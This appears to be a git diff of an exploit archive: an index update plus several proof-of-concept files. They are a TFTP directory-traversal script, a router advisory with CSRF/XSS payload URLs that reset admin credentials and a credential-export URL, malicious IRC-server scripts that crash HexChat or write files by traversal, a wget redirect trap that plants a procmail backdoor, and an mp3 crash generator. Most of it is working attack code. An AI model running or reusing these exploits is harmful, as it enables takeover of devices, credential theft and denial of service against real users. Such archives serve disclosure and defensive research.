Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0 37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0 @@ -34548,7 +34548,7 @@ id,file,description,date,author,platform,type,port 38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0 38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0 -38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0 +38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 @@ -35879,3 +35879,7 @@ id,file,description,date,author,platform,type,port 39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0 +39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0 +39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 +39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 +39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 diff --git a/platforms/hardware/dos/38475.txt b/platforms/hardware/dos/38475.txt index f52a6ff7f..d5ad1763f 100755 --- a/platforms/hardware/dos/38475.txt +++ b/platforms/hardware/dos/38475.txt @@ -13,6 +13,8 @@ Reported: Public release: Author: Lyon Yang +Paper: https://www.exploit-db.com/docs/39658.pdf + Summary: -------- diff --git a/platforms/hardware/remote/17507.py b/platforms/hardware/remote/17507.py index 3b58b1d8b..3d6f541da 100755 --- a/platforms/hardware/remote/17507.py +++ b/platforms/hardware/remote/17507.py @@ -1,105 +1,8 @@ -############################################################################## - -Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability -Author : Veerendra G.G from SecPod Technologies (www.secpod.com) -Vendor : http://www.avaya.com/usa/product/ip-office -Advisory : http://www.avaya.com/usa/product/ip-office - http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap - http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py - http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt -Version : Avaya IP Office Manager TFTP Server Version 8.1 -Date : 08/07/2011 - -############################################################################### - -SecPod ID: 1017 25/05/2011 Issue Discovered - 31/05/2011 Vendor Notified - No Response from the Vendor - 08/07/2011 Advisory Released - - -Class: Information Disclosure Severity: Medium - - -Overview: ---------- -Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory -Traversal vulnerability. - - -Technical Description: ----------------------- -The vulnerability is caused due to improper validation to Read Request -Parameter containing '../' sequences, which allows attackers to read -arbitrary files via directory traversal attacks. - - -Impact: --------- -Successful exploitation could allow an attacker to to obtain sensitive -information, which can lead to launching further attacks. - - -Affected Software: ------------------- -Avaya IP Office Manager TFTP Server Version 8.1 - - -Tested on: ------------ -Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3. - - -References: ------------ -http://secpod.org/blog/?p=225 -http://www.avaya.com/usa/product/ip-office -http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap -http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py -http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt - - -Proof of Concept: ----------------- -http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py -http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap - - -Solution: ----------- -Not available - - -Risk Factor: -------------- - CVSS Score Report: - ACCESS_VECTOR = NETWORK - ACCESS_COMPLEXITY = LOW - AUTHENTICATION = NOT_REQUIRED - CONFIDENTIALITY_IMPACT = PARTIAL - INTEGRITY_IMPACT = NONE - AVAILABILITY_IMPACT = NONE - EXPLOITABILITY = PROOF_OF_CONCEPT - REMEDIATION_LEVEL = UNAVAILABLE - REPORT_CONFIDENCE = CONFIRMED - CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) - CVSS Temporal Score = 4.5 - Risk factor = Medium - - -Credits: --------- -Veerendra G.G of SecPod Technologies has been credited with the discovery of -this vulnerability. - - -SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py: - #!/usr/bin/python ############################################################################## -# Exploit : http://secpod.org/blog/?p=3D225 -# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py -# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +# Exploit : http://secpod.com/blog/?p=225 +# http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py +# http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt # Author : Veerendra G.G from SecPod Technologies (www.secpod.com) # # Get File content using Directory Traversal Attack @@ -111,13 +14,13 @@ def sendPacket(HOST, PORT, data): Sends UDP Data to a Particular Host on a Specified Port with a Given Data and Return the Response ''' - udp_sock =3D socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_sock.sendto(data, (HOST, PORT)) - data =3D udp_sock.recv(1024) + data = udp_sock.recv(1024) udp_sock.close() return data -if __name__ =3D=3D "__main__": +if __name__ == "__main__": if len(sys.argv) < 2: print "\tUsage: python exploit.py target_ip" @@ -125,13 +28,13 @@ if __name__ =3D=3D "__main__": print "\tExiting..." sys.exit(0) - HOST =3D sys.argv[1] =09=09=09## The Server IP - PORT =3D 69 =09=09=09## Default TFTP port + HOST = sys.argv[1] ## The Server IP + PORT = 69 ## Default TFTP port - data =3D "\x00\x01" =09=09=09## TFTP Read Request - data +=3D "../" * 10 + "boot.ini" + "\x00"=09## Read boot.ini file using directory traversal - data +=3D "octet\x00"=09=09=09=09## TFTP Type + data = "\x00\x01" ## TFTP Read Request + data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal + data += "octet\x00" ## TFTP Type - rec_data =3D sendPacket(HOST, PORT, data) + rec_data = sendPacket(HOST, PORT, data) print "Data Found on the target : %s " %(HOST) print rec_data.strip() \ No newline at end of file diff --git a/platforms/hardware/webapps/39659.txt b/platforms/hardware/webapps/39659.txt new file mode 100755 index 000000000..4999ff62a --- /dev/null +++ b/platforms/hardware/webapps/39659.txt @@ -0,0 +1,231 @@ + _ _ _ _ + | | | | | | + ___ _ ____ _____| | | | __ _| |__ ___ + / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| +| (_) | | \ V V / __/ | | | (_| | |_) \__ \ + \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ + + Security Adivisory + 2016-04-03 + www.orwelllabs.com + Twitter:@orwelllabs + + magicword: d0ubl3th1nk1ng... + + +Overview +======= +Technical Risk: high +Likelihood of Exploitation: medium +Vendor: PQI Group +Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and +6W51-0000R2XXX +Credits: Discovered and researched by Orwelllabs +Adivisory URL: +http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html + + +Issues +===== +I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352) +II. Multiple Stored Cross-site Scripting (CWE-79) +III. Multiple Reflected Cross-Site Scripting (CWE-79) +IV. Insecure Direct Request +V. Insecure Default Permissions (CWE-276) +VI. No SSL + + +background +========= +The smart lipstick-shaped PQI Air Pen express is the world's smallest +wireless router/access point combo you can get today. +PQI Air Pen express can be powered via an external adapter or a powered USB +port on your computer and provide a excellent wireless expreience for +everyone. + + +I. Cross-Site Request Forgery (CSRF) (CWE-352) +``````````````````````````````````````````````````````````````````````` +If a user visits a page bellow, this will set the administrative credential +for PQI Air Pen express to "root:r00t" + + + + +
+ + + +
+ + + + +The attacker can also abuse of the multiple XSS in this device to exploit +this vulnerability, something like this to set the same cred 'root:r00t' + +http:// +{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22 +http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!-- + + +The following poc will set the credential to access point to "3groot:3g00t" +(and of course, any other value could be set in this way.) + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + < -- 3G +User + <-- 3G +Password + + + + +
+ + + + +II. Stored Cross-site Scripting (CWE-79) +`````````````````````````````````````````````````````````` +"Wide Area Network (WAN) Settings" + +# PocParameter: "hostname" +http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[ +* STOREDXSS +*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= + + +"Webs URL Filter Settings" + +# PocParameter: "addURLFilter" +http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS* +]&addwebsurlfilter=Add + +Request in this page will show a pop-up with a content of javascript +payload: +http://{airpenXweb}/firewall/content_filtering.asp + +# Parameter: "addHostFilter" +http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS* +]&addwebscontentfilter=Add + + +III. Reflected Cross-Site Scripting (CWE-79) +`````````````````````````````````````````````````````````````` +Virtually all application inputs are vulnerable to cross-site scripting, +since it is not carried out any validation of the data provided by the +user. +Bellow are some examples: + + +"Basic Wireless Settings" + +# PocParameter: "mssid_0" +http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[* +XSS * +]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1 + +# PocParameter: "ssid" +http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS * +]&security_mode=Disable&wzsecureAlgorithm=AES + +# PocParameter: "hostname" +http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS +-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= + +# Parameter: "admpass" +http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ] + +IV. Insecure Direct Request +```````````````````````````````````````` +This device allows remote attackers to obtain sensitive information, +including all credentials available via direct request to +/cgi-bin/ExportSettings.sh. + +PoC: +http://{airpenXweb}/cgi-bin/ExportSettings.sh + +V. Insecure Default Permissions (CWE-276) +`````````````````````````````````````````````````````````````` +In the device description (on the Vendor's site) it is very clear that the +priority is to +facilitate everything for you, including setting. Therefore it is not +mandatory that a password +is configured for the web interface and not to connect to the AP, this way +you can find hundreds +of these completely unprotected APs. + +VI. No SSL +`````````````````` +Any action, whether sensitive or not is transmitted in plain text because +HTTPS is not used and no step. + +POST /goform/setSysAdm HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 +Firefox/44.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://xxx.xxx.xxx.xxx/adm/management.asp +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 35 + +admuser=ORWL_user&admpass=ORWL_pass + +Timeline +======= +2015-10-25 - Issues discovered +2015-11-04 - Vendor contacted +2015-12-12 - Another attempt to contact the Vendor... +2016-02-26 - Public Disclosure +* There is no easy way to contact the vendor. Emails sent remain unanswered +and forms site contacts as well. diff --git a/platforms/multiple/dos/39657.py b/platforms/multiple/dos/39657.py new file mode 100755 index 000000000..aa87be34b --- /dev/null +++ b/platforms/multiple/dos/39657.py @@ -0,0 +1,74 @@ +#!/usr/bin/python +# +#################### +# Meta information # +#################### +# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow +# Date: 2016-02-07 +# Exploit Author: PizzaHatHacker +# Vendor Homepage: https://hexchat.github.io/index.html +# Software Link: https://hexchat.github.io/downloads.html +# Version: 2.11.0 +# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits) +# CVE : CVE-2016-2233 + +############################# +# Vulnerability description # +############################# +''' +Stack Buffer Overflow in src/common/inbound.c : +void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data) + +In this function, Hexchat IRC client receives the available extensions from +the IRC server (CAP LS message) and constructs the request string to indicate +later which one to use (CAP REQ message). +This request string is stored in the fixed size (256 bytes) byte array +'buffer'. It has enough space for all possible options combined, BUT +it will overflow if some options are repeated. + +CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) +CVSS Base Score : 7.5 +Impact Subscore : 6.4 +Exploitability Subscore : 10 +''' + +#################### +# Proof of Concept # +#################### +''' +* Install Hexchat IRC Client +* Run this Python script on a (server) machine +* Connect to the server running the script +* Results : Hexchat will crash (most probably access violation/segmentation fault) +''' + +import socket +import sys +import time + +# Exploit configuration +HOST = '' +PORT = 6667 +SERVERNAME = 'irc.example.com' +OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes + +# Create server socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +try: + sock.bind((HOST, PORT)) # Bind to port + sock.listen(0) # Start listening on socket + + print 'Server listening, waiting for connection...' + conn, addr = sock.accept() + + print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...' + conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n') + + # Wait and close socket + conn.recv(256) + sock.close() + + print 'Done.' + +except socket.error as msg: + print 'Network error : ' + str(msg[0]) + ' ' + msg[1] diff --git a/platforms/multiple/local/39656.py b/platforms/multiple/local/39656.py new file mode 100755 index 000000000..145d74d03 --- /dev/null +++ b/platforms/multiple/local/39656.py @@ -0,0 +1,93 @@ +#!/usr/bin/python +# +#################### +# Meta information # +#################### +# Exploit Title: Hexchat IRC client - Server name log directory traversal +# Date: 2016-01-26 +# Exploit Author: PizzaHatHacker +# Vendor Homepage: https://hexchat.github.io/index.html +# Software Link: https://hexchat.github.io/downloads.html +# Version: 2.11.0 +# Tested on: HexChat 2.11.0 & Linux (64 bits) +# CVE : CVE-2016-2087 + +############################# +# Vulnerability description # +############################# +''' +Server Name Directory Traversal in src/common/text.c : +static char * log_create_pathname (char *servname, char *channame, char *netname) + +In this function, channame (channel name) and netname (network name as +configured in the client software) are sanitized to prevent directory +traversal issues when creating a logfile BUT servname (server-provided +information) is NOT sanitized before possibly being injected into +the file path via the 'log_insert_vars' function call. + +This bug could be triggered in the special (non-default) configuration +where a user would have : +* Enabled logging (Settings > Preferences > Chatting > Logging) +* Used a pattern containing '%s' in the log filepath (instead +of the default = '%n\%c.log'). + +When connecting to a malicious server, Hexchat IRC client may create or modify +arbitrary files on the filesystem with the permissions of the IRC client user +(non-root). For example, the following directories are accessible easily : +* /addons : Executable plugin files that are automatically loaded +when starting Hexchat IRC client +* /logs : ALL logfiles (from other servers too) +* /scrollback : Scrollback text that is automatically +loaded when entering a channel/server (this may trigger further bugs) +* /sounds : Sounds that may be played on demand via CTCP +SOUND messages (this could also trigger further bugs) +* etc. + +CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P) +CVSS Base Score : 4 +Impact Subscore : 4.9 +Exploitability Subscore : 4.9 +''' + +#################### +# Proof of Concept # +#################### +''' +* Install Hexchat IRC Client +* Settings > Preferences > Chatting > Logging : Enable logging and use the log +filepath pattern : '%s\%c.log' (without the quotes) +* Run this Python script on a (server) machine +* Connect to the server running the script +* Results : A 'PIZZA' directory will appear in /PIZZA instead +of something like /logs/___PIZZA +''' + +import socket +import sys +import time + +# Exploit configuration +HOST = '' +PORT = 6667 +SERVERNAME = '../PIZZA' + +# Create server socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +try: + sock.bind((HOST, PORT)) # Bind to port + sock.listen(0) # Start listening on socket + + print 'Server listening, waiting for connection...' + conn, addr = sock.accept() + + print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...' + conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n') + + # Wait and close socket + conn.recv(256) + sock.close() + + print 'Done.' + +except socket.error as msg: + print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1] diff --git a/platforms/multiple/remote/689.pl b/platforms/multiple/remote/689.pl index 5b57c356c..3616307d9 100755 --- a/platforms/multiple/remote/689.pl +++ b/platforms/multiple/remote/689.pl @@ -1,8 +1,8 @@ #!/usr/bin/perl -W # wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability # -# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm) -# License: Public Domain - SECU +# Copyright 2004 Jan Min???? (jjminar fastmail fm) +# License: Public Domain # # When wget connects to us, we send it a HTTP redirect constructed so that wget # wget will connect the second time, it will be attempting to override @@ -12,20 +12,20 @@ use POSIX qw(strftime); # This is our scheme/host/port -$server =3D "http://localhost:31340"; +$server = "http://localhost:31340"; # Use this + DNS poisoning with wget 1.9 & CVS -#$server =3D "http://.."; +#$server = "http://.."; -# Wanna know who got infected?=20 -#$log =3D "/dev/pts/1"; +# Wanna know who got infected? +#$log = "/dev/pts/1"; # The filename we will try to overwrite on the target system -$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; +$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; ############### Payload ######################################### -$email =3D 'your@mailbox'; -$password =3D 'Pmrpuf ner cevzvgvirf'; -$payload =3D <$log" if $log; while(){ -print LOG $_ if $log; -if (/\Q$trick$filename\E/) { -#if (/%2f/) { -# We see the filename, so this is the second time -# they're here. Time to feed the sploit. -$second++; -} elsif (/^Range: bytes=3D\(33\)-/) { -# Appending goes like this: -# (1) Tell'em what you're gonna tell'em -# (2) Then tell'em just a half -# (3) Close it -# (4) Wait -# (5) They're comin' back, with wget -c -# (6) Tell'em the sploit -# (7) Close again -# (8) Wtf? They're comin' back with wget -c again -# (9) Tell'em the rest... -# (10) ... enjoying the backdoor at the same time -print LOG "File if $1 bytes long\n" if $log; -} elsif (/^\r?$/) { -# The HTTP headers are over. Let's do it! -$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime); -if (!$second) { -# Print the payload -print <\r EOT -} else { -# Print the redirection -print <new('legit.mp3'); # whatever mp3 you got handy + +$mp3->title_set('A' x 5000); # title/artist tags +$mp3->artist_set('A' x 5000); # may vary although both seems to be needed + +$mp3->update_tags(); +$mp3->close(); + +print "[*] Completed.\n"; \ No newline at end of file